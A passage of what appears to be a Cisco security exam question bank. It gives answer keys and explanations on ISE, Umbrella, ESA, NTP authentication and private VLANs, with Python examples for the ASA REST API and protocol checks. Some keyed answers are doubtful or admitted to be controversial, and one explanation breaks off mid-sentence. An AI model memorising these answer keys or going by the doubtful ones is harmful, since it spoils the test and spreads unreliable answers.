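    """Send one authenticated request to the ASA REST agent; return (status, data)."""
    creds = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(f"https://{ASA_HOST}{path}", method=method,
                                 data=json.dumps(body).encode() if body else None)
    req.add_header("Authorization", f"Basic {creds}")
    req.add_header("Content-Type", "application/json")
    req.add_header("User-Agent", "REST API Agent")   # value the ASA agent expects (assumption)
    ctx = ssl.create_default_context()
    if not verify_tls:                # lab only; never disable verification in production
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
        raw = resp.read()
        return resp.status, (json.loads(raw) if raw else None)


if __name__ == "__main__":
    rule = build_global_rule("10.1.1.0/24", "any", "tcp/443", permit=True,
                             remark="added via REST API", position=1)
    print(json.dumps(rule, indent=2))
    if os.environ.get("ASA_USER"):    # only talk to a real ASA when credentials are given
        status, created = asa_request("POST", GLOBAL_RULES, rule,
                                      os.environ["ASA_USER"], os.environ["ASA_PASS"])
        print(status, created)        # 201 Created on success; Location header carries the objectId
```

The difference between the answer options is just the HTTP verb and path: POST to the collection adds a rule (answer D), DELETE to the collection plus the rule’s objectId removes one (answer A), and neither touches the hostname or the saved configuration.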

Question 96

Refer to the exhibit.

When creating an access rule for URL filtering, a network engineer adds certain categories and individual
URLs to block. What is the result of the configuration?

A. Only URLs for botnets with a reputation score of 3 will be allowed while the rest will be blocked
B. Only URLs for botnets with reputation scores of 1-3 will be blocked
C. Only URLs for botnets with reputation scores of 3-5 will be blocked
D. Only URLs for botnets with a reputation score of 3 will be blocked

Answer: B

Explanation

When you create a rule to Block traffic based on a reputation level, selection of a reputation level also
selects all of the reputation levels more severe than the level you originally selected. For example, if you
configure a rule to block Benign Sites with security risks (level 3), it also automatically blocks Suspicious
sites (level 2) and High risk (level 1) sites.

Reference: https://www.cisco.com/c/en/us/support/docs/security/firesight-management-center/118852-
technote-firesight-00.html

Question 97

What are two functionalities of SDN Northbound APIs? (Choose two)

A. Northbound APIs provide a programmable interface for applications to dynamically configure the
network.
B. Northbound APIs form the interface between the SDN controller and business applications.
C. Northbound APIs use the NETCONF protocol to communicate with applications.
D. Northbound APIs form the interface between the SDN controller and the network switches or routers.
E. OpenFlow is a standardized northbound API protocol.

Answer: A B

Explanation

Northbound APIs present an abstraction of network functions with a programmable interface for
applications to consume the network services and configure the network dynamically -> Answer A is
correct.

Northbound APIs usually use RESTful APIs to communicate with applications -> Answer C is not correct.

Southbound APIs form the interface between the SDN controller and the network switches or routers ->
Answer D is not correct.
OpenFlow and NETCONF are Southbound APIs used for most SDN implementations -> Answer E is not
correct.

Question 98

What must be enabled to secure SaaS-based applications?

A. two-factor authentication
B. end-to-end encryption
C. application security gateway
D. modular policy framework

Answer: A

Explanation

According to this link, we can use the following to secure SaaS-based applications:
+ Set up single sign-on (SSO) integrations
+ Use multi-factor authentication (MFA) -> Answer A is correct.
+ Install and integrate an identity governance solution
+ Stay up to date

Question 99

A Cisco ISE engineer configures Central Web Authentication (CWA) for wireless guest access and must
have the guest endpoints redirect to the guest portal for authentication and authorization. While testing
the policy, the engineer notices that the device is not redirected and instead gets full guest access. What
must be done for the redirect to work?

A. Create an advanced attribute setting of Cisco.cisco-gateway-id=guest within the authorization profile
for the authorization policy line that the unauthenticated devices hit.
B. Tag the guest portal in the CWA part of the Common Tasks section of the authorization profile for the
authorization policy line that the unauthenticated devices hit.
C. Add the DACL name for the Airespace ACL configured on the WLC in the Common Tasks section of the
authorization profile for the authorization policy line that the unauthenticated devices hit
D. Use the track movement option within the authorization profile for the authorization policy line that the
unauthenticated devices hit

Answer: C

Explanation

Using an Authorization Profile to Redirect Guest Endpoints to ISE

As explained in Understanding Guest Flow, when endpoints first access the network, they are
authenticated with MAB, and must be redirected to the Guest portal for authorization. ISE comes with a
built-in profile called Cisco_WebAuth that references a built-in self-registered Guest portal. The WLC and
switch require a preconfigured redirect ACL.

AireOS does not support downloadable ACLs. Therefore, ACLs must be configured locally on the wireless
controller (or access points in FlexConnect mode). The ACL names must match in both ISE and in AireOS.
The figure below indicates for a wireless guest:

Reference: https://community.cisco.com/t5/security-documents/ise-guest-access-prescriptive-deployment-guide/ta-p/3640475

Question 100

What is a difference between Cisco AMP for Endpoints and Cisco Umbrella?

A. Cisco AMP for Endpoints prevents, detects, and responds to attacks before damage can be done, and
Cisco Umbrella provides the first line of defense against Internet threats.
B. Cisco AMP for Endpoints prevents connections to malicious destinations, and Cisco Umbrella works at
the file level to prevent the initial execution of malware.
C. Cisco AMP for Endpoints automatically researches indicators of compromise and confirms threats, and
Cisco Umbrella does not
D. Cisco AMP for Endpoints is a cloud-based service, and Cisco Umbrella is not

Answer: A

Question 101

What is the intent of a basic SYN flood attack?

A. to flush the register stack to re-initiate the buffers
B. to solicit DNS responses
C. to exceed the threshold limit of the connection queue
D. to cause the buffer to overflow

Answer: C

Explanation

A SYN flood (half-open attack) is a type of distributed denial-of-service (DDoS) attack which aims to make a
server unavailable to legitimate traffic by consuming all available server resources. By repeatedly sending
initial connection request (SYN) packets, the attacker is able to overwhelm all available ports on a targeted
server machine, causing the targeted device to respond to legitimate traffic sluggishly or not at all.

Question 102

Which open standard creates a framework for sharing threat intelligence in a machine-digestible format?

A. OpenC2
B. OpenIoC
C. STIX
D. Cybox

Answer: B

Explanation

OpenIOC is an open framework, meant for sharing threat intelligence information in a machine-readable
format. It was developed by the American cybersecurity firm MANDIANT in November 2011. It is written in
eXtensible Markup Language (XML) and can be easily customized for additional intelligence so that incident
responders can translate their knowledge into a standard format. Organizations can leverage this format
to share threat-related latest Indicators of Compromise (IoCs) with other organizations, enabling real-time
protection against the latest threats.

Question 103

Which two methods must be used to add switches into the fabric so that administrators can control how
switches are added into DCNM for private cloud management? (Choose two)

A. PowerOn Auto Provisioning
B. Cisco Cloud Director
C. Seed IP
D. CDP AutoDiscovery
E. Cisco Prime Infrastructure

Answer: A C

Explanation

Cisco Data Center Network Manager (DCNM) offers network management system (NMS) support for
traditional or multiple-tenant LAN and SAN fabrics. Cisco DCNM uses PowerOn Auto Provisioning (POAP) to
automate the process of upgrading software images and installing configuration files on Cisco Nexus
switches that are being deployed in the network.

Reference: https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/prime-data-center-network-manager/guide-c07-740626.html

Question 104

Which role is a default guest type in Cisco ISE?

A. Full-Time
B. Contractor
C. Yearly
D. Monthly

Answer: B

Explanation

Each guest account must be associated with a guest type. Guest types allow a sponsor to assign different
levels of access and different network connection times to a guest account. These guest types are
associated with particular network access policies. Cisco ISE includes these default guest types:
Contractor – Users who need access to the network for an extended amount of time, up to a year.
Daily – Guests who need access to the resources on the network for just 1 to 5 days.
Weekly – Users who need access to the network for a couple of weeks.

Reference: https://www.cisco.com/c/en/us/td/docs/security/ise/1-3/admin_guide/b_ise_admin_guide_13/b_ise_admin_guide_sample_chapter_01111.html

Question 105

An engineer configures new features within the Cisco Umbrella dashboard and wants to identify and proxy
traffic that is categorized as risky domains and may contain safe and malicious content. Which action
accomplishes these objectives?

A. Configure intelligent proxy within Cisco Umbrella to intercept and proxy the requests for only those
categories
B. Upload the threat intelligence database to Cisco Umbrella for the most current information on
reputations and to have the destination lists block them.
C. Create a new site within Cisco Umbrella to block requests from those categories so they can be sent to
the proxy device.
D. Configure URL filtering within Cisco Umbrella to track the URLs and proxy the requests for those
categories and below.

Answer: A

Explanation

The ‘greylist’ of risky domains is comprised of domains that host both malicious and safe content—we
consider these “risky” domains. These sites often allow users to upload and share content—making them
difficult to police, even for the admins of the site.

Reference: https://docs.umbrella.com/deployment-msp/docs/what-is-the-intelligent-proxy

In order to enable intelligent proxy, we need to use “Advanced Settings”:

Question 106

An administrator enables Cisco Threat Intelligence Director on a Cisco FMC. Which process uses STIX and
allows uploads and downloads of block lists?

A. consumption
B. editing
C. sharing
D. authoring

Answer: A

Question 107

Why is it important to have a patching strategy for endpoints?

A. so that functionality is increased on a faster scale when it is used
B. so that known vulnerabilities are targeted and having a regular patch cycle reduces risks
C. so that patching strategies can assist with disabling nonsecure protocols in applications
D. to take advantage of new features released with patches

Answer: B

Question 108

What is a description of microsegmentation?

A. Environments deploy a container orchestration platform, such as Kubernetes, to manage the application
delivery
B. Environments apply a zero-trust model and specify how applications on different servers or containers
can communicate
C. Environments implement private VLAN segmentation to group servers with similar applications
D. Environments deploy centrally managed host-based firewall rules on each server or container

Answer: B

Explanation

Zero Trust is a security framework requiring all users, whether in or outside the organization’s network, to
be authenticated, authorized, and continuously validated for security configuration and posture before
being granted or keeping access to applications and data. Zero Trust assumes that there is no traditional
network edge; networks can be local, in the cloud, or a combination or hybrid with resources anywhere as
well as workers in any location.

The Zero Trust model uses microsegmentation — a security technique that involves dividing perimeters
into small zones to maintain separate access to every part of the network — to contain attacks.

Question 109

Which security product enables administrators to deploy Kubernetes clusters in air-gapped sites without
needing Internet access?

A. Cisco Container Controller
B. Cisco Container Platform
C. Cisco Cloud Platform
D. Cisco Content Platform

Answer: B

Explanation

The ability to deploy Kubernetes clusters in air-gapped sites

Cisco Container Platform (CCP) tenant images contain all the necessary binaries and don’t need internet
access to function.

Reference: https://www.cisco.com/c/en/us/products/cloud-systems-management/container-platform/index.html#~stickynav=3

Question 110

What are two functions of TAXII in threat intelligence sharing? (Choose two)

A. exchanges trusted anomaly intelligence information
B. determines how threat intelligence information is relayed
C. determines the “what” of threat intelligence
D. supports STIX information and allows users to describe threat motivations and abilities

Answer: A B

Explanation

In short, TAXII is about how parties communicate to exchange threat intelligence and STIX is about
describing that threat intelligence in a structured way.

Reference: https://logsentinel.com/blog/the-importance-of-threat-intelligence-sharing-through-taxii-and-stix/?cookie-state-change=1639912854054

STIX states the “what” of threat intelligence, while TAXII defines “how” that information is relayed.

Reference: https://www.anomali.com/resources/what-are-stix-taxii

Question 111

An engineer must modify a policy to block specific addresses using Cisco Umbrella. The policy is created
already and is actively used by devices, using many of the default policy elements. What else must be
done to accomplish this task?

A. Create a destination list for addresses to be allowed or blocked
B. Use content categories to block or allow specific addresses
C. Add the specified addresses to the identities list and create a block action
D. Modify the application settings to allow only applications to connect to required addresses

Answer: A

Explanation

Content Categories – Allows you to block access to categories of websites – groupings of sites with
similarly themed content. For example, sports, gambling, or astrology…, not specific addresses -> Answer
B is not correct.

Application Settings – Allows you to block access to specific applications (not specific addresses). For
example, Netflix, Facebook, or Amazon -> Answer D is not correct.

Destination Lists allows you to create a unique list of destinations (for example, domain name or URL) to
which you can block or allow access -> Answer A is correct.

Reference: https://docs.umbrella.com/deployment-umbrella/docs/customize-your-policies-1

An identity list cannot be an address, as Umbrella uses the following identities: Network, Network Device,
Roaming Computers, Mobile Devices, Chrome Book, Network Tunnel and Web Users and Groups.

Reference: https://www.cisco.com/c/dam/en/us/solutions/collateral/enterprise/design-zone-security/umbrella-design-guide.pdf

Question 112

Drag and drop the descriptions from the right onto the correct positions on the left.

Answer:

+ threat prevention and mitigation for known and unknown threats: NGIPS
+ real-time threat intelligence and security protection: Collective Security Intelligence
+ detection, blocking and remediation to protect the enterprise against targeted malware attacks: AMP
+ policy enforcement based on complete visibility of users and communication between virtual machines:
Full Context Awareness

Question 113

Refer to the exhibit.

All servers are in the same VLAN/Subnet. DNS Server-1 and DNS Server-2 must communicate with each
other, and all servers must communicate with default gateway multilayer switch. Which type of private
VLAN ports should be configured to prevent communication between DNS servers and the file server?

A. Configure GigabitEthernet0/1 as promiscuous port, GigabitEthernet0/2 as isolated port, and
GigabitEthernet0/3 and GigabitEthernet0/4 as community ports.
B. Configure GigabitEthernet0/1 as community port, GigabitEthernet0/2 as promiscuous port,
GigabitEthernet0/3 and GigabitEthernet0/4 as isolated ports.
C. Configure GigabitEthernet0/1 as promiscuous port, GigabitEthernet0/2 as community port and
GigabitEthernet0/3 and GigabitEthernet0/4 as isolated ports.
D. Configure GigabitEthernet0/1 as community port, GigabitEthernet0/2 as isolated port, and
GigabitEthernet0/3 and GigabitEthernet0/4 as promiscuous ports.

Answer: A

Explanation

* Isolated: only communicate with promiscuous ports. Notice that it cannot even communicate with
another isolated port. Also, there can be only 1 isolated VLAN per PVLAN.
* Promiscuous: can communicate with all other ports. The default gateway is usually connected to this
port so that all devices in PVLAN can go outside.
* Community: can communicate with other members of that community and promiscuous ports but
cannot communicate with other communities. There can be multiple community VLANs per PVLAN.
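The three port rules above are small enough to model directly. The following is an added example (not part of the original question bank or of any Cisco documentation): it encodes the isolated/promiscuous/community reachability rules as a function, then checks each candidate port assignment against the requirements stated in the question. The mapping of hosts to ports (Gi0/1 = default-gateway switch, Gi0/2 = file server, Gi0/3 and Gi0/4 = the two DNS servers) is an assumption made for the model, since the exhibit is not reproduced here.

```python
from dataclasses import dataclass
from itertools import combinations
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class PvlanPort:
    name: str
    mode: str                         # "promiscuous", "isolated" or "community"
    community: Optional[str] = None   # secondary community VLAN (community ports only)


def can_communicate(a: PvlanPort, b: PvlanPort) -> bool:
    """Layer-2 reachability between two ports of the same primary private VLAN."""
    if "promiscuous" in (a.mode, b.mode):
        return True                        # promiscuous ports reach every other port
    if "isolated" in (a.mode, b.mode):
        return False                       # isolated ports reach promiscuous ports only
    return a.community == b.community      # community ports: same community only


def reachability_matrix(ports: Dict[str, PvlanPort]) -> Dict[Tuple[str, str], bool]:
    """Reachability for every pair of ports in the design."""
    return {(x, y): can_communicate(ports[x], ports[y])
            for x, y in combinations(sorted(ports), 2)}


def validate_design(ports: Dict[str, PvlanPort],
                    requirements: List[Tuple[str, str, bool]]) -> List[Tuple[str, str, bool]]:
    """Return the (port, port, expected) requirements that the design fails to meet."""
    return [(x, y, want) for x, y, want in requirements
            if can_communicate(ports[x], ports[y]) != want]


# Constructed model of the exhibit. Which host sits behind which port is an assumption:
# Gi0/1 = default-gateway multilayer switch, Gi0/2 = file server, Gi0/3 and Gi0/4 = DNS servers.
GATEWAY, FILE_SERVER, DNS1, DNS2 = "Gi0/1", "Gi0/2", "Gi0/3", "Gi0/4"

REQUIREMENTS = [
    (DNS1, DNS2, True),            # DNS Server-1 and DNS Server-2 talk to each other
    (GATEWAY, FILE_SERVER, True),  # every server reaches the default gateway
    (GATEWAY, DNS1, True),
    (GATEWAY, DNS2, True),
    (FILE_SERVER, DNS1, False),    # file server must not reach the DNS servers
    (FILE_SERVER, DNS2, False),
]


def design_answer_a() -> Dict[str, PvlanPort]:
    """Option A: Gi0/1 promiscuous, Gi0/2 isolated, Gi0/3 and Gi0/4 community."""
    return {
        GATEWAY: PvlanPort(GATEWAY, "promiscuous"),
        FILE_SERVER: PvlanPort(FILE_SERVER, "isolated"),
        DNS1: PvlanPort(DNS1, "community", "dns"),
        DNS2: PvlanPort(DNS2, "community", "dns"),
    }


def design_answer_c() -> Dict[str, PvlanPort]:
    """Option C: Gi0/1 promiscuous, Gi0/2 community, Gi0/3 and Gi0/4 isolated."""
    return {
        GATEWAY: PvlanPort(GATEWAY, "promiscuous"),
        FILE_SERVER: PvlanPort(FILE_SERVER, "community", "files"),
        DNS1: PvlanPort(DNS1, "isolated"),
        DNS2: PvlanPort(DNS2, "isolated"),
    }


if __name__ == "__main__":
    for label, design in (("A", design_answer_a()), ("C", design_answer_c())):
        print(f"Option {label}: violations = {validate_design(design, REQUIREMENTS)}")
```

Option A satisfies every requirement; option C fails because two isolated ports (the DNS servers) cannot reach each other, which is exactly the rule "it cannot even communicate with another isolated port" from the explanation.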

Question 1

A Cisco ESA network administrator has been tasked to use a newly installed service to help create policy
based on the reputation verdict. During testing, it is discovered that the Cisco ESA is not dropping files
that have an undetermined verdict. What is causing this issue?

A. The policy was created to send a message to quarantine instead of drop
B. The file has a reputation score that is above the threshold
C. The file has a reputation score that is below the threshold
D. The policy was created to disable file analysis

Answer: C

Explanation

If the file is known to the reputation service but there is insufficient information for a definitive verdict, the
reputation service returns a reputation score based on characteristics of the file such as threat fingerprint
and behavioral analysis. If this score meets or exceeds the configured reputation threshold, the appliance
applies the action that you have configured in the mail policy for files that contain malware.

Reference: https://www.cisco.com/c/en/us/td/docs/security/esa/esa11-1/user_guide/b_ESA_Admin_Guide_11_1/b_ESA_Admin_Guide_chapter_010000.html

From the reference we can deduce that the file reputation score is below the threshold so ESA is not
dropping it.

Question 2

An administrator is trying to determine which applications are being used in the network but does not want
the network devices to send metadata to Cisco Firepower. Which feature should be used to accomplish
this?

A. NetFlow
B. Packet Tracer
C. Network Discovery
D. Access Control

Answer: C

Explanation

NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow
data generated by NetFlow-enabled routers and switches. The flows do not contain actual packet data, but
rather the metadata for communications. It is a standard form of session data that details who, what,
when, and where of network traffic -> Answer A is not correct.

Reference: https://www.cisco.com/c/en/us/solutions/collateral/enterprise-networks/enterprise-network-security/white-paper-c11-736595.html

Question 3

Which attack is preventable by Cisco ESA but not by the Cisco WSA?

A. buffer overflow
B. DoS
C. SQL injection
D. phishing

Answer: D

Explanation

The following are the benefits of deploying Cisco Advanced Phishing Protection on the Cisco Email Security
Gateway:

Prevents the following:
+ Attacks that use compromised accounts and social engineering.
+ Phishing, ransomware, zero-day attacks and spoofing.
+ BEC with no malicious payload or URL.

Reference: https://www.cisco.com/c/en/us/td/docs/security/esa/esa13-5/user_guide/b_ESA_Admin_Guide_13-5/m_advanced_phishing_protection.html

Question 4

A Cisco ESA administrator has been tasked with configuring the Cisco ESA to ensure there are no viruses
before quarantined emails are delivered. In addition, delivery of mail from known bad mail servers must
be prevented. Which two actions must be taken in order to meet these requirements? (Choose two)

A. Use outbreak filters from SenderBase
B. Enable a message tracking service
C. Configure a recipient access table
D. Deploy the Cisco ESA in the DMZ
E. Scan quarantined emails using AntiVirus signatures.

Answer: A E

Explanation

We should scan emails using AntiVirus signatures to make sure there are no viruses attached in emails.
Note: A virus signature is the fingerprint of a virus. It is a set of unique data, or bits of code, that allow it
to be identified. Antivirus software uses a virus signature to find a virus in a computer file system, allowing
to detect, quarantine, and remove the virus.

SenderBase is an email reputation service designed to help email administrators research senders, identify
legitimate sources of email, and block spammers. When the Cisco ESA receives messages from known or
highly reputable senders, it delivers them directly to the end user without any content scanning. However,
when the Cisco ESA receives email messages from unknown or less reputable senders, it performs
antispam and antivirus scanning.

Reference: https://www.cisco.com/c/en/us/td/docs/security/esa/esa12-0/user_guide/b_ESA_Admin_Guide_12_0/b_ESA_Admin_Guide_12_0_chapter_0100100.html

-> Therefore Outbreak filters can be used to block emails from bad mail servers.

Web servers and email gateways are generally located in the DMZ so

Note: The recipient access table (RAT), not to be confused with remote-access Trojan (also RAT), is a
Cisco ESA term that defines which recipients are accepted by a public listener.

Question 5

Which type of dashboard does Cisco DNA Center provide for complete control of the network?

A. service management
B. centralized management
C. application management
D. distributed management

Answer: B

Explanation

Cisco’s DNA Center is the only centralized network management system to bring all of this functionality
into a single pane of glass.

Reference: https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/dna-center/nb-06-dna-center-faq-cte-en.html

Question 6

In an IaaS cloud services model, which security function is the provider responsible for managing?

A. Internet proxy
B. firewalling virtual machines
C. CASB
D. hypervisor OS hardening

Answer: B

Explanation

In this IaaS model, cloud providers offer resources to users/machines that include computers as virtual
machines, raw (block) storage, firewalls, load balancers, and network devices.

Reference: https://ieeexplore.ieee.org/document/8777457

This is a controversial question but according to the above reference, IaaS is responsible for both virtual
machines and firewall so we believe the answer “firewalling virtual machines” is better than “hypervisor OS
hardening”.

Note: Cloud access security broker (CASB) provides visibility and compliance checks, protects data against
misuse and exfiltration, and provides threat protections against malware such as ransomware.

Question 7

A network engineer has been tasked with adding a new medical device to the network. Cisco ISE is being
used as the NAC server, and the new device does not have a supplicant available. What must be done in
order to securely connect this device to the network?

A. Use MAB with profiling
B. Use MAB with posture assessment.
C. Use 802.1X with posture assessment.
D. Use 802.1X with profiling.

Answer: A

Explanation

As the new device does not have a supplicant, we cannot use 802.1X.

MAC Authentication Bypass (MAB) is a fallback option for devices that don’t support 802.1x. It is virtually
always used in deployments in some way shape or form. MAB works by having the authenticator take the
connecting device’s MAC address and send it to the authentication server as its username and password.
The authentication server will check its policies and send back an Access-Accept or Access-Reject just like
it would with 802.1x.

Cisco ISE Profiling Services provides dynamic detection and classification of endpoints connected to the
network. Using MAC addresses as the unique identifier, ISE collects various attributes for each network
endpoint to build an internal endpoint database. The classification process matches the collected attributes
to prebuilt or user-defined conditions, which are then correlated to an extensive library of profiles. These
profiles include a wide range of device types, including mobile clients (iPads, Android tablets,
Chromebooks, and so on), desktop operating systems (for example, Windows, Mac OS X, Linux, and
others), and numerous non-user systems such as printers, phones, cameras, and game consoles.

Once classified, endpoints can be authorized to the network and granted access based on their profile. For
example, endpoints that match the IP phone profile can be placed into a voice VLAN using MAC
Authentication Bypass (MAB) as the authentication method. Another example is to provide differentiated
network access to users based on the device used. For example, employees can get full access when
accessing the network from their corporate workstation but be granted limited network access when
accessing the network from their personal iPhone.

Reference: https://community.cisco.com/t5/security-documents/ise-profiling-design-guide/ta-p/3739456

Question 8

An engineer is implementing NTP authentication within their network and has configured both the client
and server devices with the command ntp authentication-key 1 md5 Cisc392368270. The server at 1.1.1.1
is attempting to authenticate to the client at 1.1.1.2, however it is unable to do so. Which command is
required to enable the client to accept the server’s authentication key?

A. ntp peer 1.1.1.1 key 1
B. ntp server 1.1.1.1 key 1
C. ntp server 1.1.1.2 key 1
D. ntp peer 1.1.1.2 key 1

Answer: B

Explanation

To configure an NTP enabled router to require authentication when other devices connect to it, use the
following commands:

NTP_Server(config)#ntp authentication-key 2 md5 securitytut
NTP_Server(config)#ntp authenticate
NTP_Server(config)#ntp trusted-key 2

Then you must configure the same authentication-key on the client router:

NTP_Client(config)#ntp authentication-key 2 md5 securitytut
NTP_Client(config)#ntp authenticate
NTP_Client(config)#ntp trusted-key 2
NTP_Client(config)#ntp server 10.10.10.1 key 2

Note: To configure a Cisco device as a NTP client, use the command ntp server <IP address>. For
example: Router(config)#ntp server 10.10.10.1. This command will instruct the router to query
10.10.10.1 for the time.
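To make visible what each of the three client-side commands contributes, the following added example (written for this page, not Cisco code or IOS behaviour verbatim) models the NTP symmetric-key check: the server appends a MAC built from a key identifier and MD5(key || 48-byte header), as laid out in RFC 5905 Appendix A, and the client accepts the packet only if a key is bound to that server association (`ntp server <ip> key <id>`), the key ID is in its trusted-key list (`ntp trusted-key`), and the key material matches (`ntp authentication-key`). The NTP header is constructed sample data; the client class and its reason strings are this example's own.

```python
import hashlib
import hmac
import struct

NTP_HEADER_LEN = 48
NTP_MD5_MAC_LEN = 4 + 16   # 32-bit key identifier followed by a 128-bit MD5 digest


def build_ntp_header(mode: int, version: int = 4) -> bytes:
    """Constructed 48-byte NTP header (RFC 5905 layout, timestamps zeroed). Sample data, not a capture."""
    li_vn_mode = (version << 3) | mode      # leap indicator 0, version, mode
    return struct.pack(
        "!BBbbIIIQQQQ",
        li_vn_mode,
        2,              # stratum
        6,              # poll exponent
        -20,            # precision exponent
        0, 0, 0,        # root delay, root dispersion, reference ID
        0, 0, 0, 0,     # reference, origin, receive, transmit timestamps
    )


def ntp_md5_mac(key: bytes, header: bytes, key_id: int) -> bytes:
    """MAC per RFC 5905 Appendix A: key ID, then MD5 over key || header."""
    digest = hashlib.md5(key + header).digest()
    return struct.pack("!I", key_id) + digest


def server_send(header: bytes, key_id: int, key: bytes) -> bytes:
    """Reply from a server configured with 'ntp authentication-key <id> md5 <key>'."""
    return header + ntp_md5_mac(key, header, key_id)


class NtpClient:
    """Model of the checks the client-side IOS commands in the explanation switch on (example's own)."""

    def __init__(self, keys: dict, trusted: set):
        self.keys = dict(keys)          # ntp authentication-key <id> md5 <key>
        self.trusted = set(trusted)     # ntp trusted-key <id>
        self.assoc_key = {}             # ntp server <ip> [key <id>]

    def configure_server(self, server_ip: str, key_id=None):
        self.assoc_key[server_ip] = key_id

    def accept(self, server_ip: str, packet: bytes):
        """Return (accepted, reason) for a reply claimed to come from server_ip."""
        header, mac = packet[:NTP_HEADER_LEN], packet[NTP_HEADER_LEN:]
        if len(header) != NTP_HEADER_LEN or len(mac) != NTP_MD5_MAC_LEN:
            return False, "malformed or unauthenticated packet"
        expected_id = self.assoc_key.get(server_ip)
        if expected_id is None:
            return False, "no key bound to this server association"
        key_id = struct.unpack("!I", mac[:4])[0]
        if key_id != expected_id:
            return False, "packet signed with a different key ID"
        if key_id not in self.trusted:
            return False, "key ID not in trusted-key list"
        key = self.keys.get(key_id)
        if key is None:
            return False, "key ID not configured"
        if not hmac.compare_digest(ntp_md5_mac(key, header, key_id), mac):
            return False, "MAC mismatch (key material differs)"
        return True, "authenticated"


def demo() -> dict:
    """Walk through the scenario from the question; returns each outcome for inspection."""
    key = b"Cisc392368270"                 # key string from the question
    server_ip = "1.1.1.1"
    header = build_ntp_header(mode=4)      # mode 4 = server reply
    packet = server_send(header, 1, key)

    client = NtpClient(keys={1: key}, trusted={1})
    results = {}
    client.configure_server(server_ip)                  # ntp server 1.1.1.1 (no key)
    results["no_key_on_association"] = client.accept(server_ip, packet)
    client.configure_server(server_ip, key_id=1)        # ntp server 1.1.1.1 key 1
    results["key_bound"] = client.accept(server_ip, packet)
    results["wrong_key"] = client.accept(server_ip, server_send(header, 1, b"other"))

    untrusting = NtpClient(keys={1: key}, trusted=set())   # key present but never trusted
    untrusting.configure_server(server_ip, key_id=1)
    results["not_trusted"] = untrusting.accept(server_ip, packet)
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:24s} -> {outcome}")
```

Only the `key_bound` case is accepted, which is why answer B (binding key 1 to the 1.1.1.1 association on the client) is the missing command: having the same key configured on both sides is necessary but not sufficient.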

Question 9

What is the role of an endpoint in protecting a user from a phishing attack?

A. Use Cisco Stealthwatch and Cisco ISE Integration.
B. Utilize 802.1X network security to ensure unauthorized access to resources.
C. Use machine learning models to help identify anomalies and determine expected sending behavior.
D. Ensure that antivirus and anti malware software is up to date.

Answer: C

Question 10

Drag and drop the NetFlow export formats from the left onto the descriptions on the right.

Answer:

+ appropriate only for the main cache: Version 5
+ introduced support for aggregation caches: Version 8
+ appropriate only for legacy systems: Version 1
+ introduced extensibility: Version 9

Explanation

The Version 1 format was the initially released version. Do not use the Version 1 format unless you are
using a legacy collection system that requires it. Use Version 9 or Version 5 export format.
Version 5 export format is suitable only for the main cache; it cannot be expanded to support new
features.
Version 8 export format is available only for aggregation caches; it cannot be expanded to support new
features.

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/cfg-nflow-data-expt.html

Question 11

An organization has noticed an increase in malicious content downloads and wants to use Cisco Umbrella
to prevent this activity for suspicious domains while allowing normal web traffic. Which action will
accomplish this task?

A. Set content settings to High
B. Configure the intelligent proxy.
C. Use destination block lists.
D. Configure application block lists.

Answer: B

Explanation

Obviously, if you allow all traffic to these risky domains, users might access malicious content, resulting in
an infection or data leak. But if you block traffic, you can expect false positives, an increase in support
inquiries, and thus, more headaches. By only proxying risky domains, the intelligent proxy delivers more
granular visibility and control.

The intelligent proxy bridges the gap by allowing access to most known good sites without being proxied
and only proxying those that pose a potential risk. The proxy then filters and blocks against specific URLs
hosting malware while allowing access to everything else.

Reference: https://docs.umbrella.com/deployment-umbrella/docs/what-is-the-intelligent-proxy

Question 12

With which components does a southbound API within a software-defined network architecture
communicate?

A. controllers within the network
B. applications
C. appliances
D. devices such as routers and switches

Answer: D

Explanation

The Southbound API is used to communicate between Controllers and network devices.

Question 13

A network administrator needs to find out what assets currently exist on the network. Third-party systems
need to be able to feed host data into Cisco Firepower. What must be configured to accomplish this?

A. a Network Discovery policy to receive data from the host
B. a Threat Intelligence policy to download the data from the host
C. a File Analysis policy to send file data into Cisco Firepower
D. a Network Analysis policy to receive NetFlow data from the host

Answer: A

Explanation

You can configure discovery rules to tailor the discovery of host and application data to your needs.

The Firepower System can use data from NetFlow exporters to generate connection and discovery events,
and to add host and application data to the network map.

A network analysis policy governs how traffic is decoded and preprocessed so it can be further
evaluated, especially for anomalous traffic that might signal an intrusion attempt -> Answer D is not
correct.

Question 14

When configuring ISAKMP for IKEv1 Phase 1 on a Cisco IOS router, an administrator needs to input the
command crypto isakmp key cisco address 0.0.0.0. The administrator is not sure what the IP
address in this command is used for. What would be the effect of changing the IP address from 0.0.0.0
to 1.2.3.4?

A. The key server that is managing the keys for the connection will be at 1.2.3.4
B. The remote connection will only be allowed from 1.2.3.4
C. The address that will be used as the crypto validation authority
D. All IP addresses other than 1.2.3.4 will be allowed

Answer: B

Explanation

The command crypto isakmp key cisco address 1.2.3.4 authenticates the IP address of the 1.2.3.4
peer by using the key cisco. The address of “0.0.0.0” will authenticate any address with this key.

Question 15

Which suspicious pattern enables the Cisco Tetration platform to learn the normal behavior of users?

A. file access from a different user
B. interesting file access
C. user login suspicious behavior
D. privilege escalation

Answer: A

Explanation

The various suspicious patterns for which the Cisco Tetration platform looks in the current release are:
+ Shell code execution: Looks for the patterns used by shell code.
+ Privilege escalation: Watches for privilege changes from a lower privilege to a higher privilege in the
process lineage tree.
+ Side channel attacks: Cisco Tetration platform watches for cache-timing attacks and page table fault
bursts. Using these, it can detect Meltdown, Spectre, and other cache-timing attacks.
+ Raw socket creation: Creation of a raw socket by a nonstandard process (for example, ping).
+ User login suspicious behavior: Cisco Tetration platform watches user login failures and user login
methods.
+ Interesting file access: Cisco Tetration platform can be armed to look at sensitive files.
+ File access from a different user: Cisco Tetration platform learns the normal behavior of which file is
accessed by which user.
+ Unseen command: Cisco Tetration platform learns the behavior and set of commands as well as the
lineage of each command over time. Any new command or command with a different lineage triggers the
interest of the Tetration Analytics platform.

